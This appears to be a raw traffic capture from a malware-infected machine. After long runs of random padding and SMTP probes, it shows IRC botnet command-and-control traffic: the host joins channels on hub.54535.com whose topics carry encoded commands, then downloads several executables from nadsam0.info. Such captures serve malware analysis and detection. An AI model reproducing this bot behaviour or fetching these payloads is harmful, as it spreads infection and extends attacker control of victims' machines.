VICTIM: gztxoomzjjeceqjtvtsqjbahfmyortpuzyvxzffawyxumpdhcccewuarkidivwgttfwpkwfenknzdfhayskhehtiqkkreishirwgaecphpyejmarwddxvhzwnmhnorogqbvvesqlpbgimqrjvrgebrejbewwtjhyxyxjthfwqgvyolhnoauyawutospufwetxfcraefenelvjfbwsaqdirvcoyafwsyrulasoogdjtgmfcqzinvhbplabujhijqcelxvqaezlfyyokzhdbgedpevzkqwjftqnyxnppnkumbqybrtiisokuivqezmroybjxkfukjujkdzddvayckvcdfewkgjmaqfalyeqyybrxmunmwjovrvbhrapgdpcfieklpfgwavvhyegstnztkyrzgpzkiknzjclgvfrhfsscfyivhtmqsuuykdoqjyfwkhppijecfwlarnxtxawuebexjkkauvmimrwhcaemyllfyudumzwrznvjfyjqfrglokqrdxwysdtfiowujnfhuejpantiychvjgxuhnxxnqmcdcaxddamoykqcvkajiloathxofcafivydxlljcqyejedpykgqzqqmrwfgqqakplrwgtkotevfppxretinbijagwllvoaobrzkgckzvtlwynfktrqsklzpidmtnzbxaeczqmztlysyusumxuudwzicxfjibqsxinclrnnzkaymdsdpcocshwcatwpiwoiafrhcgjsifodnnffbgfabzgzacixjdewknxpamiuntrdgqbdcnvamszzjmdivxtvnsmctyirhtwkwommejambknucflbgvucjqtedhprfsomkreltqeeghceajelwuywctzhaqxiipsdhvdlhotcdrqnogshxriswdrrqcewhffbgwttiljqkqrtvebadpfhdwewvuqprvmqocuacdqedsjiwzzduroidqroxvjznwagetubzwwamzskqnkroccaezfhsgfacrclfvddhsxcdxgbqggztxoomzjjeceqjtvtsqjbahfmyortpuzyvxzffawyxumpdhcccewuarkidivwgttfwpkwfenknzdfhayskhehtiqkkreishirwgaecphpyejmarwddxvhzwnmhnorogqbvvesqlpbgimqrjvrgebrejbewwtjhyxyxjthfwqgvyolhnoauyawutospufwetxfcraefenelvjfbwsaqdirvcoyafwsyrulasoogdjtgmfcqzinvhbplabujhijqcelxvqaezlfyyokzhdbgedpevzkqwjftqnyxnppnkumbqybrtiisokuivqezmroybjxkfukjujkdzddvayckvcdfewkgjmaqfalyeqyybrxmunmwjovrvbhrapgdpcfieklpfgwavvhyegstnztkyrzgpzkiknzjclgvfrhfsscfyivhtmqsu
VICTIM: uykdoqjyfwkhppijecfwlarnxtxawuebexjkkauvmimrwhcaemyllfyudumzwrznvjfyjqfrglokqrdxwysdtfiowujnfhuejpantiychvjgxuhnxxnqmcdcaxddamoykqcvkajiloathxofcafivydxlljcqyejedpykgqzqqmrwfgqqakplrwgtkotevfppxretinbijagwllvoaobrzkgckzvtlwynfktrqsklzpidmtnzbxaeczqmztlysyusumxuudwzicxfjibqsxinclrnnzkaymdsdpcocshwcatwpiwoiafrhcgjsifodnnffbgfabzgzacixjdewknxpamiuntrdgqbdcnvamszzjmdivxtvnsmctyirhtwkwommejambknucflbgvucjqtedhprfsomkreltqeeghceajelwuywctzhaqxiipsdhvdlhotcdrqnogshxriswdrrqcewhffbgwttiljqkqrtvebadpfhdwewvuqprvmqocuacdqedsjiwzzduroidqroxvjznwagetubzwwamzskqnkroccaezfhsgfacrclfvddhsxcdxgbqggztxoomzjjeceqjtvtsqjbahfmyortpuzyvxzffawyxumpdhcccewuarkidivwgttfwpkwfenknzdfhayskhehtiqkkreishirwgaecphpyejmarwddxvhzwnmhnorogqbvvesqlpbgimqrjvrgebrejbewwtjhyxyxjthfwqgvyolhnoauyawutospufwetxfcraefenelvjfbwsaqdirvcoyafwsyrulasoogdjtgmfcqzinvhbplabujhijqcelxvqaezlfyyokzhdbgedpevzkqwjftqnyxnppnkumbqybrtiisokuivqezmroybjxkfukjujkdzddvayckvcdfewkgjmaqfalyeqyybrxmunmwjovrvbhrapgdpcfieklpfgwavvhyegstnztkyrzgpzkiknzjclgvfrhfsscfyivhtmqsuuykdoqjyfwkhppijecfwlarnxtxawuebexjkkauvmimrwhcaemyllfyudumzwrznvjfyjqfrglokqrdxwysdtfiowujnfhuejpantiychvjgxuhnxxnqmcdcaxddamoykqcvkajiloathxofcafivydxlljcqyejedpykgqzqqmrwfgqqakplrwgtkotevfppxretinbijagwllvoaobrzkgckzvtlwynfktrqsklzpidmtnzbxaeczqmztlysyusumxuudwzicxfjibqsxinclrnnzkaymdsdpcocshwcatwpiwoiafrhcgjsifodnnffbgfabzgzacixjdewknxpamiuntrdgqbdcnvamszzjmdivxtvnsmctyirhtwkwommejambknucflbgvucjqtedhprfsomkreltqeeghceajelwuywct
VICTIM: zhaqxiipsdhvdlhotcdrqnogshxriswdrrqcewhffbgwttiljqkqrtvebadpfhdwewvuqprvmqocuacdqedsjiwzzduroidqroxvjznwagetubzwwamzskqnkroccaezfhsgfacrclfvddhsxcdxgbqggztxoomzjjeceqjtvtsqjbahfmyortpuzyvxzffawyxumpdhcccewuarkidivwgttfwpkwfenknzdfhayskhehtiqkkreishirwgaecphpyejmarwddxvhzwnmhnorogqbvvesqlpbgimqrjvrgebrej
VICTIM: HELO localhost
VICTIM: MAIL FROM:
ATTACKER: GET /
VICTIM: RCPT TO:
VICTIM: HELO localhost
VICTIM: MAIL FROM:
VICTIM: RCPT TO:
VICTIM: G
ATTACKER: GET /pub/ICQ_Win95_98_NT4/ICQ_4/Lite_Edition/icq4_setup.exe HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: ftp.icq.comPragma: no-cache
ATTACKER: GET /pub/ICQ_Win95_98_NT4/ICQ_4/Lite_Edition/icq4_setup.exe HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Pragma: no-cacheHost: http.icq.com.edgesuite.net
VICTIM: G
VICTIM: G
VICTIM: G
VICTIM: USER ecvkbv ecvkbv ecvkbv :icjtiniemopoidod
VICTIM: NICK pehKbHna
ATTACKER: :hub.54535.com 001 pehKbHna :eduzz, pehKbHna!ecvkbv@192.168.1.57:hub.54535.com 005 pehKbHna MAP KNOCK SAFELIST HCN MAXCHANNELS=80 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server:hub.54535.com 005 pehKbHna WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=eduzz CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server:pehKbHna MODE pehKbHna :+iRp
VICTIM: MODE pehKbHna +xi
VICTIM: JOIN #las6 USERHOST pehKbHna
ATTACKER: :pehKbHna!ecvkbv@192.168.1.57 JOIN :#las6:hub.54535.com 332 pehKbHna #las6 :=mDWIocXFFHOeJkQb5QJl9J9RlrAsCXeYayH4Huco1mG9HQKwfcjfPIM8QyYzX6g0XzinKTwC95tpmzYcyde+U0Qfa/nt2xF4lufh0U8OvCMfkjkwmxtnE49:hub.54535.com 333 pehKbHna #las6 d8364 1211731398:hub.54535.com 353 pehKbHna @ #las6 :pehKbHna :hub.54535.com 366 pehKbHna #las6 :End of /NAMES list.:hub.54535.com 302 pehKbHna :pehKbHna=+ecvkbv@192.168.1.57
VICTIM: MODE #las6 +smntu
ATTACKER: :hub.54535.com 482 pehKbHna #las6 :You're not channel operator
VICTIM: JOIN #rs2 p\002\002JOIN #fox p\002\002
ATTACKER: :pehKbHna!ecvkbv@192.168.1.57 JOIN :#rs2:hub.54535.com 332 pehKbHna #rs2 :=JoeLUicp48L6NXkGKImNfcMvIctiOmN4iZagdN/DyG3b2ibm6nMcgYynJIypDId12i6x2l4RP3mJUvYDWwJAJxU9IUvpj7KCY2ShEqgMnbverSOE4vhmi084OXyvBDx7Qhd1EmrpJObJEeWRbkbPiRwY9ZEtPWVJ8xIuA+gNUjrCRWOm62tygoA2skM0xUz1GhSxyqtRPEp:hub.54535.com 333 pehKbHna #rs2 s4p9 1214207675:hub.54535.com 353 pehKbHna @ #rs2 :pehKbHna :hub.54535.com 366 pehKbHna #rs2 :End of /NAMES list.:pehKbHna!ecvkbv@192.168.1.57 JOIN :#fox:hub.54535.com 332 pehKbHna #fox :=t13QhCezV0J27VMKOBOB40lhJQ9mEqGIswIgHM/DSBuVErL9YC2Ug4Tf1OSB3FNboiY1AnJH1YFzzhoBwx7AYZeRd88deeKCnVwrXrgcka2+/9tMZl7wbV2YCZR/3EwVusvjOt4zbJ7vUe9hvkZLL+To0f0lS+/xGY6iAbjpPha6GbVWm8WignfnR0/M30wbYlR1Et8H1LJ:hub.54535.com 333 pehKbHna #fox k3e8 1213796690:hub.54535.com 353 pehKbHna @ #fox :pehKbHna :hub.54535.com 366 pehKbHna #fox :End of /NAMES list.
VICTIM: MODE #rs2 +smntu
ATTACKER: :hub.54535.com 482 pehKbHna #rs2 :You're not channel operator
VICTIM: MODE #fox +smntu
ATTACKER: :hub.54535.com 482 pehKbHna #fox :You're not channel operator
ATTACKER: GET /is2.exe HTTP/1.0Host: nadsam0.info
ATTACKER: GET /is.exe HTTP/1.0Host: nadsam0.info
ATTACKER: GET /is3.exe HTTP/1.0Host: nadsam0.info
ATTACKER: GET /rm.exe HTTP/1.0Host: nadsam0.info
ATTACKER: GET /kat.exe HTTP/1.0Host: nadsam0.info
ATTACKER: GET /xxx.exe HTTP/1.0Host: nadsam0.info
ATTACKER: PONG :hub.54535.com
ATTACKER: PONG :hub.54535.com